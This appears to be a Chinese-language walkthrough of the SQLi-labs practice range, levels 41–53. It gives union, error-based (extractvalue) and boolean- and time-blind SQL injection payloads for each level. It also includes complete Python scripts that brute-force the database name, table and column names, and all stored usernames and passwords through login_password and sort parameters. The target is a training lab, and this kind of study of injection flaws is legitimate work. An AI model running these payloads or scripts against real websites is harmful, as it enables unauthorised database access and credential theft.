sqli.labs靶场(41-53关)

41、第四十一关

-1 union select 1,2,3--+

-1 union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+

-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')--+

-1 union select 1,2,(select group_concat(username,'~',password) from security.users)--+

42、第四十二关

这关login_password是单引号闭合,可用布尔盲注

123'+or+1=1--+

上脚本爆库:

import string

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-42/login.php"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password": f"123' or substr(database(),{p},1)='{a}'#", "mysubmit": "Login"})
            if len(res.text) == 1580:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user" : "admin", "login_password": f"123' or substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password": f"123' or substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password":  f"123' or substr((select group_concat(username,':',password) from users),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

43、第四十三关

这关是POST请求,login_password参数单引号加括号闭合

POC:111')--+,有报错信息,可以用报错注入

111')+and+extractvalue(1,concat(0x7e,database(),0x7e))--+

111')+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))--+

111')+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e))--+

111')+and+extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from security.users),0x7e))--+

44、第四十四关

POST请求,login_password参数单引号闭合

可以用布尔盲注,POC:123'+or+lenth(database())=1--+

这个脚本注入比较方便

import string

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-44/login.php"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password": f"123' or substr(database(),{p},1)='{a}'#", "mysubmit": "Login"})
            if len(res.text) == 1580:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user" : "admin", "login_password": f"123' or substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password": f"123' or substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password":  f"123' or substr((select group_concat(username,':',password) from users),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

45、第四十五关

这关是login_password参数单引号加括号闭合

可以使用布尔盲注POC:123')+or+substr(database(),1,1)='a'--+

脚本爆库

import string

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-45/login.php"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password": f"123') or substr(database(),{p},1)='{a}'#", "mysubmit": "Login"})
            if len(res.text) == 1580:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user" : "admin", "login_password": f"123') or substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password": f"123') or substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password":  f"123') or substr((select group_concat(username,':',password) from users),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

46、第四十六关

参数是sort

4+and+extractvalue(1,concat(0x7e,database()))

4+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')))

4+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') ))

47、第四十七关

sort=1

sort=2

sort=3

sort=4

应该是报错了,一共三个字段,不显示错误可以用时间盲注

48、第四十八关

和上一关差不多,这关单引号闭合

还是要时间盲注

脚本

import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-48/?sort=1%20"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and%20substr(database(),{p},1)=%27{a}%27%20and%20sleep(1)"
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27%20and%20sleep(1)"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

49、第四十九关

和48关差不多,也是时间盲注,需要单引号闭合

上脚本

import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-49/?sort=1%27%20"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and%20substr(database(),{p},1)=%27{a}%27%20and%20sleep(1)--+"
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27%20and%20sleep(1)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

50、第五十关

有报错信息,试一下报错注入

sort=10+and+extractvalue(1,concat(0x7e,database()))

sort=10+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')))

sort=10+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))

sort=10+and+extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from security.users)))

51、第五十一关

有报错信息,还得报错注入,单引号闭合

sort=3'+and+extractvalue(1,concat(0x7e,database()))--+

sort=3'+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')))--+

sort=3'+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))--+

sort=3'+and+extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from security.users)))--+

52、第五十二关

没有报错信息,得用盲注,时间盲注

上脚本

import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-52/?sort=1%20"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and%20substr(database(),{p},1)=%27{a}%27%20and%20sleep(1)--+"
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27%20and%20sleep(1)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

53、第五十三关

单引号闭合,没有报错,还得是盲注

上脚本

python 复制代码
import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-53/?sort=22%27%20"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and%20substr(database(),{p},1)=%27{a}%27%20and%20sleep(0.5)--+"
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 5:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'%20and%20sleep(0.5)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 5:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'%20and%20sleep(0.5)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 5:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27%20and%20sleep(0.5)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 5:
                users = f"{users}{a}"
                print(a, end='')
                num = 0
相关推荐
师太,答应老衲吧2 小时前
SQL实战训练之,力扣:2020. 无流量的帐户数(递归)
数据库·sql·leetcode
Yaml43 小时前
Spring Boot 与 Vue 共筑二手书籍交易卓越平台
java·spring boot·后端·mysql·spring·vue·二手书籍
Channing Lewis3 小时前
salesforce case可以新建一个roll up 字段,统计出这个case下的email数量吗
数据库·salesforce
追风林3 小时前
mac 本地docker-mysql主从复制部署
mysql·macos·docker
毕业设计制作和分享4 小时前
ssm《数据库系统原理》课程平台的设计与实现+vue
前端·数据库·vue.js·oracle·mybatis
ketil274 小时前
Redis - String 字符串
数据库·redis·缓存
NiNg_1_2344 小时前
高级 SQL 技巧详解
sql
Hsu_kk5 小时前
MySQL 批量删除海量数据的几种方法
数据库·mysql
编程学无止境5 小时前
第02章 MySQL环境搭建
数据库·mysql
knight-n5 小时前
MYSQL库的操作
数据库·mysql